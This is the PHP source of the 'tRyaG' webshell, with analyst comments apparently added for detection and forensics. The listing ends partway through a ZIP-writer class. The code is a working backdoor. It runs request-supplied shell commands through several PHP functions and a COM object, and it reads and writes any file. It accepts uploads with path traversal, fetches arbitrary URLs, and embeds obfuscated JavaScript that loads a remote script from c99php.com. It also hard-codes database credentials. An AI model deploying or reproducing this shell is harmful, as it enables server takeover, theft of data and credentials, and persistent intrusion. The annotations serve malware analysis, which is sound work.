1<?php
2/******************************************************************************************************/
3/* tryag.php - https://www.youtube.com/channel/UCag2xiYkYWTgMOSjszUXafg?view_as=subscriber
/* منظمة الكاسر الذهبي (Windows-1256 text shown as mojibake in the original): https://www.youtube.com/channel/UCag2xiYkYWTgMOSjszUXafg?view_as=subscriber
5/* by: 1.0 (03.10.2006)
6/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
7/*
8/*
9/* by tryag@tryag.com
10/******************************************************************************************************/
11
12
13/******************************************************************************************************/
14
15?>
16
17
18<html>
19<head>
20<title>* ReJect Secret * </title>
<script type="text/javascript" language="javascript">
<!--
// Obfuscated document.write(): every character of MI, minus 48, is an index
// into the alphabet ML. Decoding by hand gives
//   <SCRIPT SRC=http://www.c99php.com/turk.js></SCRIPT>
// i.e. every render of this shell pulls remote JavaScript from a third-party
// domain (a phone-home / tracking hook baked into the "free" shell; what
// turk.js contained is not visible here). The ML/MI string pair is a stable
// static signature for this family.
ML="P<>phTsmtr/9:Cuk RIc=jSw.o";
MI="1F=AB05@FA=D4883<::GGGHC;;343HCI7:8>9?HE621:F=AB052";
OT="";
for(j=0;j<MI.length;j++){
OT+=ML.charAt(MI.charCodeAt(j)-48);
}document.write(OT);
// --></script>
30<body bgcolor="#000000">
31<table Width='100%' height='10%' bgcolor='#AA0000' border='1'>
32<tr>
33<td><center><font size='6' color='#BBB516'> tRyaG TeaM ___ IsL4m1C ~ W4rR10R</font></center></td>
34</tr>
35</table>
36<style type="text/css">
37body, td {
38 font-family: "Tahoma";
39 font-size: "12px";
40 line-height: "150%";
41}
42.smlfont {
43 font-family: "Tahoma";
44 font-size: "11px";
45}
46.INPUT {
47 FONT-SIZE: "12px";
48 COLOR: "#000000";
49 BACKGROUND-COLOR: "#FFFFFF";
50 height: "18px";
51 border: 1px solid #666666 none;
52 padding-left: "2px"
53}
54.redfont {
55 COLOR: "#A60000";
56}
57a:link, a:visited, a:active {
58 color: "#FF0000";
59 text-decoration: underline;
60}
61a:hover {
62 color: "#FFFFFF";
63 text-decoration: none;
64}
65.top {BACKGROUND-COLOR: "#AA0000"}
66.firstalt {BACKGROUND-COLOR: "#000000"}
67.secondalt {BACKGROUND-COLOR: "#000000"}
68</style>
69<SCRIPT language=JavaScript>
// Sets every control in `form` to the state of a checkbox named 'chkall'.
// No control named 'chkall' is rendered anywhere in this chunk (the listing
// uses dl[...] checkboxes), so this looks like an unused leftover.
function CheckAll(form) {
 for (var i=0;i<form.elements.length;i++) {
 var e = form.elements[i];
 if (e.name != 'chkall')
 e.checked = form.chkall.checked;
 }
}
// Confirm-then-navigate helper for deletions: after confirm(m) it loads
// ?dir=<d>&deldir=<f> (t == 1) or ?dir=<d>&delfile=<f>.
// No PHP handler for 'deldir'/'delfile' is visible in this chunk; deltree()
// exists further down but is never called here, so the GET parameters these
// URLs carry are still the useful detection artefact.
function really(d,f,m,t) {
 if (confirm(m)) {
 if (t == 1) {
 window.location.href='?dir='+d+'&deldir='+f;
 } else {
 window.location.href='?dir='+d+'&delfile='+f;
 }
 }
}
86</SCRIPT>
87</head>
88
89<body>
90<center>
91
92<hr width="775" noshade>
93<table width="775" border="0" cellpadding="0">
<?PHP
// ---------------------------------------------------------------------------
// ANALYST NOTES. This file is the "tRyaG" PHP webshell (2006-era; it relies on
// PHP 4/5-only APIs: eregi(), mysql_*(), each(), get_magic_quotes_gpc(),
// PHP4-style constructors, bare-word array keys). Every feature below runs
// attacker-supplied input by design. The comments describe what each
// primitive does and what it leaves behind for detection/forensics; nothing
// here is a fix, and the sample must not be deployed.
// ---------------------------------------------------------------------------

// 7 = E_ERROR|E_WARNING|E_PARSE: notices from undefined variables/keys
// (the file has many) are hidden. Output buffering is never flushed
// explicitly; PHP flushes it at exit.
error_reporting(7);
ob_start();
$mtime = explode(' ', microtime());
$starttime = $mtime[1] + $mtime[0];
// Emulates register_globals when it is off: every POST/GET key becomes a
// global variable. From here on, bare variables such as $dir, $execfunc,
// $doupfile, $uploaddir, $content, $newdirectory and $REQUEST_URI are
// request-controlled. EXTR_SKIP only protects names already defined above.
$onoff = (function_exists('ini_get')) ? ini_get('register_globals') : get_cfg_var('register_globals');
if ($onoff != 1) {
 @extract($_POST, EXTR_SKIP);
 @extract($_GET, EXTR_SKIP);
}
$mohajer = getcwd();
$self = $_SERVER['PHP_SELF'];
// Used below to decide whether phpinfo() can be called.
$dis_func = get_cfg_var("disable_functions");
110
///////////////////////////////
 //
// Hard-coded database credentials for the compromised host (the "_vb"
// suffix suggests a vBulletin database, unverified). They are consumed by
// the LOAD DATA LOCAL INFILE file reader further down. $mysql_use is never
// read anywhere in this chunk. Incident response: treat these credentials
// as leaked and rotate them; the account name is also a pivot for finding
// the original victim.
$mysql_use = "no"; //"yes" //
$mhost = "localhost"; //
$muser = "mjalnet_mjal"; //
$mpass = "99080806"; //
$mdb = "mjalnet_vb"; //
 //
///////////////////////////////
120
121
// Undo magic_quotes_gpc on the superglobals (stripslashes_array() is defined
// later in the file). Note the extract() above already copied the still-
// slashed values into globals, so $dir etc. keep their backslashes while
// $_POST/$_GET do not. Removed in PHP 8 (fatal there).
if (get_magic_quotes_gpc()) {
 $_GET = stripslashes_array($_GET);
 $_POST = stripslashes_array($_POST);
}
126
127
128
// "PHPinfo" button: dumps the full phpinfo() page (paths, loaded modules,
// environment, open_basedir) to the attacker unless "phpinfo" appears in
// disable_functions. eregi() was removed in PHP 7.
if (empty($_POST['phpinfo'] )) {
 }else{
 echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo()";
 exit;
}
134
135
// Hidden server-side fetch (no form in this chunk posts 'url'): any URL or
// stream wrapper accepted by file_get_contents() (http://, ftp://, file://,
// php://...) is fetched with the web server's network position and echoed
// raw — an SSRF / internal-network pivot and a local-file reader in one.
// The failure string is GBK-encoded Chinese shown as mojibake (appears to
// mean "failed to fetch URL content").
if (isset($_POST['url'])) {
 $proxycontents = @file_get_contents($_POST['url']);
 echo ($proxycontents) ? $proxycontents : "<body bgcolor=\"#F5F5F5\" style=\"font-size: 12px;\"><center><br><p><b>»ñÈ¡ URL ÄÚÈÝʧ°Ü</b></p></center></body>";
 exit;
}
141
// "TrYaG Team" button: prints a credits page (Windows-1256 Arabic handles
// rendered as mojibake) and exits. No capability, but the constant strings
// ("tRyaG TeaM", "WWW.TrYaG.CoM/vb", "ReJect Secret") are reliable
// attribution / YARA anchors. $action is assigned and never used.
if (empty($_POST['TrYaG'] ) ) {
 }ELSE{
 $action = '?action=TrYaG';
 echo "<table Width='100%' height='10%' bgcolor='#000000' border='1'><tr><td><center><font size='6' color='#BBB516'>
ÇáßÇÓÑ ÇáÐåÈí<br><br>
020 <br><br>
ÇáãåÇÌÑ22 <br><br>
ÇÈæãíáÇÝ <br><br>
ÚÐÇÈí ÛíÑ <br><br>
cRiMiNaL NeT <br><br>
MR.WOLF <br><br>
ÚÈÏÇááå00 <br><br>
ãÍãæÏ Úáí <br><br>
ÞÇåÑ ÇáíåæÏ <br><br>
al3iznet <br><br>
ÇáæÍÔ ÇáßÇÓÑ<br><br>
ÌãíÚ ÇáÍÞæÞ ãÍÝæÙÉ <br><br>
ãäÙãÉ ÇáßÇÓÑ ÇáÐåÈí & ÊÑíÇÞ ÇáÚÑÈ <br><br>
WWW.TrYaG.CoM/vb <br><br>
íÓãÍ ÈÇáäÞá ÈÓ ÇÑÌæ ÚÏã ÇÒÇáå ÍÞæÞ ÇáÝÑ íÞ <br><br>";


 echo "</font></center></td></tr></table> ";

 exit;
 }
// ---------------------------------------------------------------------------
// Command execution. POST 'command' is passed verbatim (no escaping, no
// allow-list) to the backend chosen by $execfunc, which is a bare variable
// and therefore comes from the request via the extract() above. Any unknown
// value falls through to system(). Detection: web-server worker spawning
// sh/cmd.exe, and the "<textarea name='textarea'" wrapper around output.
// ---------------------------------------------------------------------------
if (empty($_POST['command'] ) ) {
 }ELSE{
 if (substr(PHP_OS, 0, 3) == 'WIN') {
 // $program/$prog are computed but never used. $pathname is only set
 // further down (L268 area), so here it is still empty.
 $program = isset($_POST['program']) ? $_POST['program'] : "c:\winnt\system32\cmd.exe";
 $prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname."/log.txt";

 echo "</form>\n";
 }
// FORMS is declared later in the file; PHP hoists unconditional top-level
// class declarations, which is why this works.
$tb = new FORMS;

$tb->tableheader();
$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>'.$_SERVER['HTTP_HOST'].'</b></td><td><b>'.$mohajer.'</b></td><td align="right"><b>'.$_SERVER['REMOTE_ADDR'].'</b></td></tr></table>','center','top');
// $REQUEST_URI is not a PHP variable unless register_globals is on or the
// attacker supplies it; it is written unescaped into the form action.
$tb->tdbody("<FORM method='POST' action='$REQUEST_URI' enctype='multipart/form-data'><INPUT type='submit' name='Rifrish' value=' dir ' id=input><INPUT type='submit'name='TrYaG' value='TrYaG Team' id=input><INPUT type='submit' name='phpinfo' value='PHPinfo' id=input><INPUT type='submit' name='shell' value='command shill' id=input></form>");
$tb->tablefooter();
$tb->tableheader();
$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>command [ system , shell_exec , passthru , Wscript.Shell , exec , popen ]</b></td></tr></table>','center','top');
$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td>');

// Backend menu; the extra 'wscript' entry on Windows uses COM instead of a
// PHP exec function (useful to the attacker when disable_functions blocks
// the others).
$execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','wscript'=>'Wscript.Shell') : array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen');
$tb->headerform(array('content'=>'<FONT COLOR=RED>cmd:</FONT>'.$tb->makeselect(array('name'=>'execfunc','option'=>$execfuncs,'selected'=>$execfunc)).' '.$tb->makeinput('command').' '.$tb->makeinput('Run','command','','submit')));

 echo"<tr class='secondalt'><td align='center'><textarea name='textarea' cols='100' rows='25' readonly>";

 if ($_POST['command'] ) {

 if ($execfunc=="system") {
 system($_POST['command']);
 } elseif ($execfunc=="passthru") {
 passthru($_POST['command']);
 } elseif ($execfunc=="exec") {
 // exec() returns only the last output line.
 $result = exec($_POST['command']);
 echo $result;
 } elseif ($execfunc=="shell_exec") {
 $result=shell_exec($_POST['command']);
 echo $result;
 } elseif ($execfunc=="popen") {
 // Only the first 2096 bytes of output are shown.
 $pp = popen($_POST['command'], 'r');
 $read = fread($pp, 2096);
 echo $read;
 pclose($pp);
 } elseif ($execfunc=="wscript") {
 // "WScript.Shell" and "cmd.exe" are split into concatenated fragments
 // to dodge naive string signatures; match on the fragments or on the
 // `new COM(` call instead.
 $wsh = new COM('W'.'Scr'.'ip'.'t.she'.'ll') or die("PHP Create COM WSHSHELL failed");
 $exec = $wsh->exec ("cm"."d.e"."xe /c ".$_POST['command']."");
 $stdout = $exec->StdOut();
 $stroutput = $stdout->ReadAll();
 echo $stroutput;
 } else {
 system($_POST['command']);
 }

 }

echo"</textarea></td></tr></form></table>";
 exit;
}//end shell
223
// Arbitrary file read / edit form. The path comes straight from POST
// 'editfile' with no base-directory check; file() does the actual read
// (the fopen() handle is opened and closed without being used). $content is
// a bare variable, so a request that also carries 'content' seeds the
// buffer via extract(). The hidden 'savefile' field feeds the writer below.
if ($_POST['editfile']){
$fp = fopen($_POST['editfile'], "r");
$filearr = file($_POST['editfile']);

foreach ($filearr as $string){

$content = $content . $string;
}

echo "<center><div id=logostrip>Edit file: $editfile </div><form action='$REQUEST_URI' method='POST'><textarea name=content cols=122 rows=20>";echo htmlentities($content); echo"</textarea>";
echo"<input type='hidden' name='dir' value='" . getcwd() ."'>
<input type='hidden' name='savefile' value='{$_POST['editfile']}'><br>
<input type='submit' name='submit' value='Save'></form></center>";
fclose($fp);
}
239
240
// Arbitrary file write — the persistence primitive (drop further shells,
// patch configs, .htaccess, etc.). Path is POST 'savefile'; body is the
// request-supplied global $content. "Successfully saved!" is printed whether
// or not fopen()/fwrite() succeeded (their return values are ignored).
// Forensics: file mtime changes with the web-server user as owner.
if($_POST['savefile']){

$fp = fopen($_POST['savefile'], "w");
$content = stripslashes($content);
fwrite($fp, $content);
fclose($fp);
echo "<center><div id=logostrip>Successfully saved!</div></center>";

}
// Upload and mkdir. $doupfile/$createdirectory/$uploaddir/$newdirectory/$dir
// are all request-supplied globals (see extract() at the top).
// Upload uses copy() rather than move_uploaded_file(); the destination is
// "<uploaddir>/<client-chosen filename>" with no sanitisation, so "../" in
// the filename escapes the target directory. The result strings are GBK
// mojibake (appear to mean "upload succeeded!/failed!").
if ($doupfile) {
 echo (@copy($_FILES['uploadfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadfile']['name']."")) ? "ÉÏ´«³É¹¦!" : "ÉÏ´«Ê§°Ü!";
}


// New directories are created world-writable (0777) and re-chmod'ed in case
// umask trimmed the mode — a good forensic tell on otherwise 0755 trees.
elseif (($createdirectory) AND !empty($_POST['newdirectory'])) {
 if (!empty($newdirectory)) {
 $mkdirs="$dir/$newdirectory";
 if (file_exists("$mkdirs")) {
 echo "can't make dir";
 } else {
 echo (@mkdir("$mkdirs",0777)) ? "ok" : "";
 @chmod("$mkdirs",0777);
 }
 }
}
266
/////////
// Directory of this script with forward slashes (used by getPath()).
$pathname=str_replace('\\','/',dirname(__FILE__));

////////
// Resolve the browsed directory. $dir arrives via ?dir= (through extract()).
// Note `$_post` (lowercase) is NOT the $_POST superglobal: with
// error_reporting(7) the notice is hidden and $dir silently becomes null
// whenever a non-empty value was supplied, so in this copy the browser
// effectively only lists the script's own directory — worth knowing before
// assuming an attacker used it to walk the filesystem (unverified on a live
// interpreter).
if (!isset($dir) or empty($dir)) {
 $dir = ".";
 $nowpath = getPath($pathname, $dir);
} else {
 $dir=$_post['dir'];
 $nowpath = getPath($pathname, $dir);
}
278
///////
// dir_writeable() has side effects on every page load: it mkdir()s
// $nowpath if missing and creates then unlinks "<dir>/test.txt". That
// create/delete pair is a cheap file-integrity / auditd indicator of the
// shell being opened. $dir_writeable, $phpinfo and $reg are computed here but
// not referenced again in this chunk.
$dir_writeable = (dir_writeable($nowpath)) ? "m" : "mm";
$phpinfo=(!eregi("phpinfo",$dis_func)) ? " | <a href=\"?action=phpinfo\" target=\"_blank\">PHPINFO()</a>" : "";
$reg = (substr(PHP_OS, 0, 3) == 'WIN') ? " | <a href=\"?action=reg\"mohajer22</a>" : "";

$tb = new FORMS;

// Header bar: host, cwd and the visitor's IP (i.e. the attacker's, unless
// proxied) are printed on every page.
$tb->tableheader();
$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>'.$_SERVER['HTTP_HOST'].'</b></td><td><b>'.$mohajer.'</b></td><td align="right"><b>'.$_SERVER['REMOTE_ADDR'].'</b></td></tr></table>','center','top');
$tb->tdbody("<FORM method='POST' action='$REQUEST_URI' enctype='multipart/form-data'><INPUT type='submit' name='Rifrish' value=' dir ' id=input><INPUT type='submit'name='TrYaG' value='TrYaG Team' id=input><INPUT type='submit' name='phpinfo' value='PHPinfo' id=input><INPUT type='submit' name='shell' value='command shill' id=input></form>");
$tb->tablefooter();
$tb->tableheader();
$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>Editfile or make & Uploud file & Make directory</b></td></tr></table>','center','top');
$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td>');
// Forms feeding the editfile / upload / mkdir / command handlers above.
// makehidden() echoes instead of returning, so its <input> lands before the
// form it was meant for.
$tb->headerform(array('content'=>'<FONT COLOR=RED>File to edit or make:</FONT>'.$tb->makehidden('dir', getcwd() ).' '.$tb->makeinput('editfile').' '.$tb->makeinput('Edit','editfile','','submit')));


$tb->headerform(array('action'=>'?dir='.urlencode($dir),'enctype'=>'multipart/form-data','content'=>'<FONT COLOR=RED>Uploud file:</FONT>'.$tb->makeinput('uploadfile','','','file').' '.$tb->makeinput('doupfile','up','','submit').$tb->makeinput('uploaddir',$dir,'','hidden')));

$tb->headerform(array('content'=>'<FONT COLOR=RED>Make directory:</FONT> '.$tb->makeinput('newdirectory').' '.$tb->makeinput('createdirectory','newdirectory','','submit')));
$execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','wscript'=>'Wscript.Shell') : array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen');
$tb->headerform(array('content'=>'<FONT COLOR=RED>cmd:</FONT>'.$tb->makeselect(array('name'=>'execfunc','option'=>$execfuncs,'selected'=>$execfunc)).' '.$tb->makeinput('command').' '.$tb->makeinput('Run','command','','submit')));

$tb->tdbody ("</td></tr></table>");
// ---------------------------------------------------------------------------
// Directory listing (default view). Two passes over $dir: subdirectories
// first, then files, with ctime/mtime/size/octal perms. Names and paths are
// echoed into HTML unescaped. Any file literally named 'config.php' is
// printed a second time in yellow — the shell is tuned for harvesting CMS
// database credentials. The dl[<path>] checkboxes have no handler in this
// chunk.
// ---------------------------------------------------------------------------
if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) {


 $tb->tableheader();
echo"<tr bgcolor='#AA0000'><td align='center' nowrap width='27%'><b>DIR</b></td><td align='center' nowrap width='16%'><b>First data</b></td><td align='center' nowrap width='16%'><b>Last data</b></td><td align='center' nowrap width='11%'><b>Size</b></td><td align='center' nowrap width='6%'><b>Perm</b></td></tr>";

// Pass 1: directories. All filesystem errors are @-suppressed, so an
// unreadable $dir simply yields an empty table.
$dirs=@opendir($dir);
$dir_i = '0';
while ($file=@readdir($dirs)) {
 $filepath="$dir/$file";
 $a=@is_dir($filepath);
 if($a=="1"){
 if($file!=".." && $file!=".") {
 $ctime=@date("Y-m-d H:i:s",@filectime($filepath));
 $mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
 $dirperm=substr(base_convert(fileperms($filepath),10,8),-4);
 echo "<tr class=".getrowbg().">\n";
 echo " <td style=\"padding-left: 5px;\">[<a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\"><font color=\"#006699\">$file</font></a>]</td>\n";
 echo " <td align=\"center\" nowrap class=\"smlfont\"><span class=\"redfont\">$ctime</span></td>\n";
 echo " <td align=\"center\" nowrap class=\"smlfont\"><span class=\"redfont\">$mtime</span></td>\n";
 echo " <td align=\"center\" nowrap class=\"smlfont\"><span class=\"redfont\"><dir></span></td>\n";
 echo " <td align=\"center\" nowrap class=\"smlfont\"><span class=\"redfont\">$dirperm</span></td>\n";
 echo "</tr>\n";
 $dir_i++;
 } else {
 if($file=="..") {
 echo "<tr class=".getrowbg().">\n";
 echo " <td nowrap colspan=\"6\" style=\"padding-left: 5px;\"><a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\">Up dir</a></td>\n";
 echo "</tr>\n";
 }
 }
 }
}// while
@closedir($dirs);

echo"<tr bgcolor='#cccccc'><td colspan='6' height='5'></td></tr><FORM method='POST'>";

// Pass 2: regular files. ctime != mtime is highlighted in red (a crude
// "recently modified" marker).
$dirs=@opendir($dir);
$file_i = '0';
while ($file=@readdir($dirs)) {
 $filepath="$dir/$file";
 $a=@is_dir($filepath);
 if($a=="0"){
 $size=@filesize($filepath);
 $size=$size/1024 ;
 $size= @number_format($size, 3);
 if (@filectime($filepath) == @filemtime($filepath)) {
 $ctime=@date("Y-m-d H:i:s",@filectime($filepath));
 $mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
 } else {
 $ctime="<span class=\"redfont\">".@date("Y-m-d H:i:s",@filectime($filepath))."</span>";
 $mtime="<span class=\"redfont\">".@date("Y-m-d H:i:s",@filemtime($filepath))."</span>";
 }
 @$fileperm=substr(base_convert(@fileperms($filepath),10,8),-4);
 echo "<tr class=".getrowbg().">\n";
 echo " <td style=\"padding-left: 5px;\">";
 echo "<INPUT type=checkbox value=1 name=dl[$filepath]>";
 // Direct link to the file through the web server (works for anything
 // under the document root).
 echo "<a href=\"$filepath\" target=\"_blank\">$file</a></td>\n";
 if ($file == 'config.php') {

 echo "<a href=\"$filepath\" target=\"_blank\"><font color='yellow'>$file<STRONG></STRONG></a></td>\n";
 }
 echo " <td align=\"center\" nowrap class=\"smlfont\"><span class=\"redfont\">$ctime</span></td>\n";
 echo " <td align=\"center\" nowrap class=\"smlfont\"><span class=\"redfont\">$mtime</span></td>\n";
 echo " <td align=\"right\" nowrap class=\"smlfont\"><span class=\"redfont\">$size</span> KB</td>\n";
 echo " <td align=\"center\" nowrap class=\"smlfont\"><span class=\"redfont\">$fileperm</span></td>\n";
 echo "</tr>\n";
 $file_i++;


 }
}// while
@closedir($dirs);

echo "</FORM>\n";
echo "</table>\n";
}// end dir
380
381
382
383
384
385
386
 // Prints elapsed time since $starttime (set at the top of the file).
 // Not called anywhere in this chunk.
 function debuginfo() {
 global $starttime;
 $mtime = explode(' ', microtime());
 $totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
 echo "Processed in $totaltime second(s)";
 }
393
394
 // Recursively stripslashes() string values of $array and returns it.
 // Keys 'argc'/'argv' and keys that are entirely upper-case (and not
 // numeric) are skipped. Relies on each(), removed in PHP 8.
 function stripslashes_array(&$array) {
 while(list($key,$var) = each($array)) {
 if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) {
 if (is_string($var)) {
 $array[$key] = stripslashes($var);
 }
 if (is_array($var)) {
 $array[$key] = stripslashes_array($var);
 }
 }
 }
 return $array;
 }
408
409
 // Recursive delete: chmods every entry to 0777 before unlinking/rmdir'ing,
 // then removes $deldir itself. Returns 1 on success, 0 otherwise. This is
 // the destructive primitive behind the JS really() links, but no PHP
 // handler for 'deldir'/'delfile' calls it within this chunk.
 function deltree($deldir) {
 $mydir=@dir($deldir);
 while($file=$mydir->read()) {
 if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) {
 @chmod("$deldir/$file",0777);
 deltree("$deldir/$file");
 }
 if (is_file("$deldir/$file")) {
 @chmod("$deldir/$file",0777);
 @unlink("$deldir/$file");
 }
 }
 $mydir->close();
 @chmod("$deldir",0777);
 return (@rmdir($deldir)) ? 1 : 0;
 }
426
427
 // Writability probe with side effects: creates $dir (0777) if it does not
 // exist, then writes and deletes "$dir/test.txt". Returns 1/0, or null
 // (undefined $writeable) if mkdir failed. The transient test.txt is a
 // reliable forensic artefact in file-system audit logs.
 function dir_writeable($dir) {
 if (!is_dir($dir)) {
 @mkdir($dir, 0777);
 }
 if(is_dir($dir)) {
 if ($fp = @fopen("$dir/test.txt", 'w')) {
 @fclose($fp);
 @unlink("$dir/test.txt");
 $writeable = 1;
 } else {
 $writeable = 0;
 }
 }
 return $writeable;
 }
443
444
 // Alternating row CSS class, driven by the global counter $bgcounter
 // (both classes are defined with the same black background above).
 function getrowbg() {
 global $bgcounter;
 if ($bgcounter++%2==0) {
 return "firstalt";
 } else {
 return "secondalt";
 }
 }
453
454
 // Joins $relativepath onto $mainpath, collapsing '.', '' and '..'
 // segments. '..' pops the last segment unconditionally — there is no
 // floor, so enough '..' components walk above the script directory; this
 // is a path joiner, not a sandbox. `global $dir` is declared but unused.
 function getPath($mainpath, $relativepath) {
 global $dir;
 $mainpath_info = explode('/', $mainpath);
 $relativepath_info = explode('/', $relativepath);
 $relativepath_info_count = count($relativepath_info);
 for ($i=0; $i<$relativepath_info_count; $i++) {
 if ($relativepath_info[$i] == '.' || $relativepath_info[$i] == '') continue;
 if ($relativepath_info[$i] == '..') {
 $mainpath_info_count = count($mainpath_info);
 unset($mainpath_info[$mainpath_info_count-1]);
 continue;
 }
 $mainpath_info[count($mainpath_info)] = $relativepath_info[$i];
 }
 return implode('/', $mainpath_info);
 }
471
472
 // Renders a php.ini value as "Yes"/"No" for 1/0, else the raw value.
 // Loose switch comparison means any non-numeric string also matches
 // case 0. Not called in this chunk.
 function getphpcfg($varname) {
 switch($result = get_cfg_var($varname)) {
 case 0:
 return "No";
 break;
 case 1:
 return "Yes";
 break;
 default:
 return $result;
 break;
 }
 }
486
487
 // "Yes"/"No" wrapper around function_exists(); the `false !==` adds
 // nothing. Not called in this chunk.
 function getfun($funName) {
 return (false !== function_exists($funName)) ? "Yes" : "No";
 }
491
492
 // In-memory ZIP writer (a widely copied "zip.lib"-style snippet) used for
 // bulk download/exfiltration of a directory; nothing in this chunk
 // instantiates it. Uses a PHP4-style constructor (removed in PHP 8) and
 // eval() to build the DOS-time bytes, which is itself a useful generic
 // signature. Output is collected in $out after construction.
 class PHPZip{
 var $out='';
 // $dir is either a directory path (recursively packed, names stored
 // relative to $dir) or an array of file paths (stored by basename()).
 // Returns 1 if gzcompress() is available, else 0.
 function PHPZip($dir) {
 if (@function_exists('gzcompress')) {
 $curdir = getcwd();
 if (is_array($dir)) $filelist = $dir;
 else{
 $filelist=$this -> GetFileList($dir);// file list
 // Appends relative names to the same array while iterating (foreach
 // works on a copy, so it terminates), leaving absolute and relative
 // entries side by side — appears to produce duplicate entries.
 foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1);
 }
 if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir);
 else chdir($curdir);
 if (count($filelist)>0){
 foreach($filelist as $filename){
 if (is_file($filename)){
 $fd = fopen ($filename, "r");
 $content = @fread ($fd, filesize ($filename));
 fclose ($fd);
 if (is_array($dir)) $filename = basename($filename);
 $this -> addFile($content, $filename);
 }
 }
 $this->out = $this -> file();
 chdir($curdir);
 }
 return 1;
 }
 else return 0;
 }


 // Recursive listing of $dir. The accumulator is a function-level static,
 // so results persist across calls and instances within one request.
 function GetFileList($dir){
 static $a;
 if (is_dir($dir)) {
 if ($dh = opendir($dir)) {
 while (($file = readdir($dh)) !== false) {
 if($file!='.' && $file!='..'){
 $f=$dir .'/'. $file;
 if(is_dir($f)) $this->GetFileList($f);
 $a[]=$f;
 }
 }
 closedir($dh);
 }
 }
 return $a;
 }

 var $datasec = array();
 var $ctrl_dir = array();
 // "PK\x05\x06": end-of-central-directory signature.
 var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
 var $old_offset = 0;

 // Unix timestamp -> packed DOS date/time (minimum 1980-01-01).
 function unix2DosTime($unixtime = 0) {
 $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
 if ($timearray['year'] < 1980) {
 $timearray['year'] = 1980;
 $timearray['mon'] = 1;
 $timearray['mday'] = 1;
 $timearray['hours'] = 0;
 $timearray['minutes'] = 0;
 $timearray['seconds'] = 0;
 } // end if
 return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
 ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
 }

 // Appends one deflated entry: local file header + data (+ data descriptor
 // fields) to $datasec and a matching central-directory record to
 // $ctrl_dir. $name is stored as given (after '\' -> '/').
 function addFile($data, $name, $time = 0) {
 $name = str_replace('\\', '/', $name);

 // Builds a "\xNN\xNN\xNN\xNN" source string and eval()s it to get the
 // little-endian DOS time bytes — pack('V', ...) would do the same
 // without eval.
 $dtime = dechex($this->unix2DosTime($time));
 $hexdtime = '\x' . $dtime[6] . $dtime[7]
 . '\x' . $dtime[4] . $dtime[5]
 . '\x' . $dtime[2] . $dtime[3]
 . '\x' . $dtime[0] . $dtime[1];
 eval('$hexdtime = "' . $hexdtime . '";');
 // "PK\x03\x04": local file header; version 2.0, no flags, method 8.
 $fr = "\x50\x4b\x03\x04";
 $fr .= "\x14\x00";
 $fr .= "\x00\x00";
 $fr .= "\x08\x00";
 $fr .= $hexdtime;

 $unc_len = strlen($data);
 $crc = crc32($data);
 $zdata = gzcompress($data);
 // $c_len is taken BEFORE the 2-byte zlib header and 4-byte Adler-32
 // trailer are stripped, so the recorded compressed size is 6 bytes
 // larger than the raw deflate stream actually written.
 $c_len = strlen($zdata);
 $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
 $fr .= pack('V', $crc);
 $fr .= pack('V', $c_len);
 $fr .= pack('V', $unc_len);
 $fr .= pack('v', strlen($name));
 $fr .= pack('v', 0);
 $fr .= $name;

 $fr .= $zdata;

 $fr .= pack('V', $crc);
 $fr .= pack('V', $c_len);
 $fr .= pack('V', $unc_len);

 $this -> datasec[] = $fr;
 $new_offset = strlen(implode('', $this->datasec));

 // "PK\x01\x02": central directory file header.
 $cdrec = "\x50\x4b\x01\x02";
 $cdrec .= "\x00\x00";
 $cdrec .= "\x14\x00";
 $cdrec .= "\x00\x00";
 $cdrec .= "\x08\x00";
 $cdrec .= $hexdtime;
 $cdrec .= pack('V', $crc);
 $cdrec .= pack('V', $c_len);
 $cdrec .= pack('V', $unc_len);
 $cdrec .= pack('v', strlen($name) );
 $cdrec .= pack('v', 0 );
 $cdrec .= pack('v', 0 );
 $cdrec .= pack('v', 0 );
 $cdrec .= pack('v', 0 );
 $cdrec .= pack('V', 32 );
 $cdrec .= pack('V', $this -> old_offset );
 $this -> old_offset = $new_offset;
 $cdrec .= $name;

 $this -> ctrl_dir[] = $cdrec;
 }

 // Assembles the final archive: entries, central directory, EOCD record.
 function file() {
 $data = implode('', $this -> datasec);
 $ctrldir = implode('', $this -> ctrl_dir);
 return
 $data .
 $ctrldir .
 $this -> eof_ctrl_dir .
 pack('v', sizeof($this -> ctrl_dir)) .
